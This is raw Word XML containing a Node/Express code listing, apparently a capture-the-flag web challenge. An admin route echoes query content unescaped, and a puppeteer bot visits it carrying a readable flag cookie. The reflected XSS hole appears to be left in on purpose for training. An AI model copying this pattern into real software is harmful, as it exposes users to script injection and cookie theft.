                <w:bCs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sleep</w:t>
            </w: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(s</w:t>
            </w:r>
            <w:proofErr w:type="gramStart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){</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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return</w:t>
            </w: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</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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new</w:t>
            </w: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</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="3973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Promise</w:t>
            </w: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((resolve)=&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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setTimeout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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resolve, s))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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</w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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app.get</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B059C7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'/'</w:t>
            </w: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 (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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req</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 res) =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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res.render</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'index.html'</w:t>
            </w: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);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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})</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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</w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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app.get</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B059C7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'/admin/view'</w:t>
            </w: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 (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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req</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 res) =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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if</w:t>
            </w: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(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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req.cookies</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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.flag</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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=== CONFIG.APPFLAG) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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res.send</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd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(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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req.query.content</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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else</w:t>
            </w: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{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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res.send</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'You are not Walter White!'</w:t>
            </w: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);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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})</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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</w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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app.post</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B059C7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'/review'</w:t>
            </w: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, limiter,  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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async</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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req</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 res) =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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const</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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initBrowser</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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= </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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puppeteer.launch</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd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({</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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executablePath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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: </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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"/opt/homebrew/bin/chromium"</w:t>
            </w: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B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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  headless: </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="78A96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true</w:t>
            </w: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B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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lastRenderedPageBreak/>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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args</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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: [</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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      </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'--disable-dev-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7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shm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B059C7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-usage'</w:t>
            </w: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B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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      </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'--no-sandbox'</w:t>
            </w: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B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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      </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'--disable-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7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setuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B059C7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-sandbox'</w:t>
            </w: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B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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      </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'--disable-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7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gpu</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B059C7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'</w:t>
            </w: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B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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      </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'--no-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7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gpu</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B059C7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'</w:t>
            </w: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B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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      </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'--disable-default-apps'</w:t>
            </w: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B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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      </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'--disable-translate'</w:t>
            </w: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B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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      </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'--disable-device-discovery-notifications'</w:t>
            </w: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B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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      </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'--disable-software-rasterizer'</w:t>
            </w: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B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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      </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'--disable-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7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xss</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B059C7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-auditor'</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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  ],</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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ignoreHTTPSErrors</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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: </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="78A96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true</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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});</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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const</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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browser = </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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await</w:t>
            </w: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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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initBrowser</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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const</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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context = </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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await</w:t>
            </w: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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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browser.createBrowserContext</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd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()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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const</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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content = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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req.body</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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.content.replace</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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"'"</w:t>
            </w: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, </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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''</w:t>
            </w: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).replace(</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'"'</w:t>
            </w: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, </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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''</w:t>
            </w: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).replace(</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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"`"</w:t>
            </w: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, </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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''</w:t>
            </w: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);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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const</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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urlToVisit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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= CONFIG.APPURL + </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'/admin/view</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B059C7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/?content</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B059C7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='</w:t>
            </w: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+ content;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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try</w:t>
            </w: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{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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const</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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page = </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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await</w:t>
            </w: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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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context.newPage</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd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();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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  </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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await</w:t>
            </w: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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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page.setCookie</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd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({</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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      name: </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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"flag"</w:t>
            </w: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B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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      </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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httpOnly</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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: </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="78A96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false</w:t>
            </w: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</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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      value: CONFIG.APPFLAG,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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      url: CONFIG.APPURL</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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  })</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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  </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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await</w:t>
            </w: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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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page.goto</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd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(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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urlToVisit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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, {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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      </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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waitUntil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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: </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'networkidle2'</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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  });</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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  </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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await</w:t>
            </w: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</w:t>
            </w:r>
            <w:proofErr w:type="gramStart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sleep(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B059C7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1000</w:t>
            </w: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);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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  </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="888888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// Close</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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  </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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await</w:t>
            </w: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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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context.close</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd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()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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res.redirect</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'/'</w:t>
            </w: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)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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} </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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catch</w:t>
            </w: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(e) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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val="ru-RU" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pP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  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="397300"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>console</w:t>
            </w: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val="ru-RU" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>.error</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd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val="ru-RU" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>(e);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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lastRenderedPageBreak/>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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await</w:t>
            </w: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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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context.close</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd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();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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res.redirect</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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'/'</w:t>
            </w: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)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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})</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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</w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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app.listen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd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(port, () =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="3973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console</w:t>
            </w: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.log(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B059C7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`Purdue winning on port </w:t>
            </w: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${port}</w:t>
            </w:r>
            <w:r w:rsidRPr="00B059C7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`</w:t>
            </w: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)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B059C7" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7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val="ru-RU" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pP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val="ru-RU" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>})</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B02547" w:rsidRPr="00B059C7" w:rsidRDefault="00B059C7" w:rsidP="00B059C7">
            <w:pPr>
              <w:spacing w:after="135" w:line="270" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B059C7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
